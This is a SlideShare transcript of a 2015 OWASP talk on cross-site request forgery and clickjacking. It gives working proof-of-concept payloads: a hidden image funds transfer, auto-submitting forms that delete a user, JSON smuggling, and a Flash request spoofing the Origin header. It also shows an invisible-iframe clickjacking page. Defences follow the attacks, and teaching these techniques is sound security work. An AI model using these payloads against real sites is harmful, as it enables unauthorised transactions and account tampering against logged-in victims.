Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Cross-site request forgery:
Ways to exploit, ways to prevent
Paulius Leščinskas, OWASP EEE Lithuania
2015-10-07
About Me
Paulius Leščinskas
Pod owner @ Adform
http://lescinskas.lt
Paulius.Lescinskas@gmail.com
@lescinskas
https://www.l...
Cross-site request forgery
(CSRF)
A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, includi...
Cross-site request forgery
(CSRF)
Typical impact:
• Initiate transactions (modify data)
• Access sensitive data
Prerequisi...
Cross-site request forgery
(CSRF)
What about POST?
Cross-site request forgery
(CSRF)
Example 2 (POST request):
<form method="post" action="https://www.example.com/deleteUser...
Cross-site request forgery
(CSRF)
No forms? Just RESTful JSON APIs?
Cross-site request forgery
(CSRF)
The same data will be sent differently as raw HTTP body. I.e.:
Name: John Doe
Text: 1 + ...
Cross-site request forgery
(CSRF)
Example 3 (POST JSON request, bypassing x-form-urlencoded structure):
<form method="post...
Cross-site request forgery
(CSRF)
All HTTP methods (GET/POST/PUT/PATCH/DELETE ...) with any data encoding can be called us...
Cross-site request forgery
(CSRF)
Flash to the attack!
Cross-site request forgery
(CSRF)
Example 4 (any HTTP-based request using ActionScript):
import flash.net.URLRequest;
impo...
Cross-site request forgery
(CSRF)
... valid if example.com has crossdomain.xml like:
<?xml version="1.0"?>
<cross-domain-p...
Cross-site request forgery
(CSRF)
Countermeasures
●
Synchronizer token pattern!
●
Check Origin header
●
Appropriate CORS h...
ClickJacking
ClickJacking
ClickJacking
<html>
<body>
<iframe src="http://victim.site" style="position: absolute;
filter:alpha(opacity=0);opacity:0">...
ClickJacking
Countermeasures
Framebusting: X-Frame-Options (XFO) response HTTP header or meta http-equiv
tag
X-Frame-Optio...
Thank you!
Upcoming SlideShare
Loading in …5
×

Owasp eee 2015 csrf

446 views

Published on

Paulius Leščinskas talk on 7 Oct 2015 during the OWASP LT #3/ OWASP EEE event.

Published in: Internet
  • Be the first to comment

Owasp eee 2015 csrf

  1. 1. Cross-site request forgery: Ways to exploit, ways to prevent Paulius Leščinskas, OWASP EEE Lithuania 2015-10-07
  2. 2. About Me Paulius Leščinskas Pod owner @ Adform http://lescinskas.lt Paulius.Lescinskas@gmail.com @lescinskas https://www.linkedin.com/in/pluton
  3. 3. Cross-site request forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. Thank you http://www.seclab.cs.sunysb.edu/seclab/jcsrf/ for the image.
  4. 4. Cross-site request forgery (CSRF) Typical impact: • Initiate transactions (modify data) • Access sensitive data Prerequisite: victim MUST be logged-in to the target system. Typical example: <img src="http://example.com/app/transferFunds? amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
  5. 5. Cross-site request forgery (CSRF) What about POST?
  6. 6. Cross-site request forgery (CSRF) Example 2 (POST request): <form method="post" action="https://www.example.com/deleteUser"> <input type="hidden" name="id" value="1" /> </form> <script> document.forms[0].submit(); </script>
  7. 7. Cross-site request forgery (CSRF) No forms? Just RESTful JSON APIs?
  8. 8. Cross-site request forgery (CSRF) The same data will be sent differently as raw HTTP body. I.e.: Name: John Doe Text: 1 + 2 = 3 • Via HTML form (application/x-www-form-urlencoded): Name=John+Doe&Text=1+%2B+2+%3D+3 • Using RESTful Web API formatted as JSON: {"Text": "John Doe", "Text": "1 + 2 = 3"}
  9. 9. Cross-site request forgery (CSRF) Example 3 (POST JSON request, bypassing x-form-urlencoded structure): <form method="post" action="https://www.example.com/deleteUser"> <input type="hidden" name='{id: 1, "ignore-me": "' value='test"}' /> </form> <script> document.forms[0].submit(); </script> Data sent: {"id": 1, "ignore-me": "=test"} http://itsecurityconcepts.com/2014/04/22/csrf-on-json-requests/
  10. 10. Cross-site request forgery (CSRF) All HTTP methods (GET/POST/PUT/PATCH/DELETE ...) with any data encoding can be called using Javascript (XmlHttpRequest aka XHR aka Ajax), if your Cross-origin resource sharing (CORS) headers allow you to call XHR from any location: OPTIONS /foo/bar Host: example.com Origin: http://foo.com Vulnerable if: Access-Control-Allow-Origin: * jQuery example: $.ajax({ url: 'http://example.com/foo/bar', type: 'DELETE', data: {"id": 1} success: function(result) { // Do something with the result } });
  11. 11. Cross-site request forgery (CSRF) Flash to the attack!
  12. 12. Cross-site request forgery (CSRF) Example 4 (any HTTP-based request using ActionScript): import flash.net.URLRequest; import flash.net.URLVariables; import flash.net.URLRequestMethod; import flash.net.URLRequestHeader; import flash.net.URLLoader; var loader:URLLoader = new URLLoader(); var req:URLRequest = new URLRequest("http://www.example.com/deleteUser"); var header:URLRequestHeader = new URLRequestHeader("Origin", "http://www.test.com"); // Setting Origin header valid until Flash 9 somewhat req.requestHeaders.push(header); req.method = URLRequestMethod.DELETE; req.contentType = 'application/json'; req.data = '{"id": 1}'; loader.load(req);
  13. 13. Cross-site request forgery (CSRF) ... valid if example.com has crossdomain.xml like: <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross-domain-policy> 9/10 Lithuanian TOP10 websites has such crossdomain.xml …mostly to load assets from flash-based banner ads. ... also, you can access ActionScript objects, functions and properties from the SWF file, hosted on other domain, if this file has Security.allowDomain("*"); (Cross-scripting)
  14. 14. Cross-site request forgery (CSRF) Countermeasures ● Synchronizer token pattern! ● Check Origin header ● Appropriate CORS headers ● Appropriate crossdomain.xml rules ● Short-living sessions (only reduces likelihood) Very hard (impossible?) to prevent CSRF is website has XSS vulnerabilities https://en.wikipedia.org/wiki/Cross-origin_resource_sharing http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
  15. 15. ClickJacking
  16. 16. ClickJacking
  17. 17. ClickJacking <html> <body> <iframe src="http://victim.site" style="position: absolute; filter:alpha(opacity=0);opacity:0"></iframe> <div style="position: relative; left: 10px; top: 10px; z-index: -1"><a href="#">CLICK ME</a></div> </body> </html> OVERRIDES ALL CSRF PROTECTIONS! https://www.owasp.org/index.php/Clickjacking http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html https://community.qualys.com/blogs/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole
  18. 18. ClickJacking Countermeasures Framebusting: X-Frame-Options (XFO) response HTTP header or meta http-equiv tag X-Frame-Options: DENY (disallows page to be loaded in IFRAME) X-Frame-Options: SAMEORIGIN (allows page to loaded in IFRAME from same origin) X-Frame-Options: ALLOW-FROM https://trusted.domain (allows page to be loaded from specific origins; unsupported by Chrome and Safari!) Worldwide usage: Facebook: DENY, Twitter: SAMEORIGIN, Github: DENY, 60% of Alexa Top 10 use framebusting... https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet (+more defense techniques) https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009) https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options
  19. 19. Thank you!

×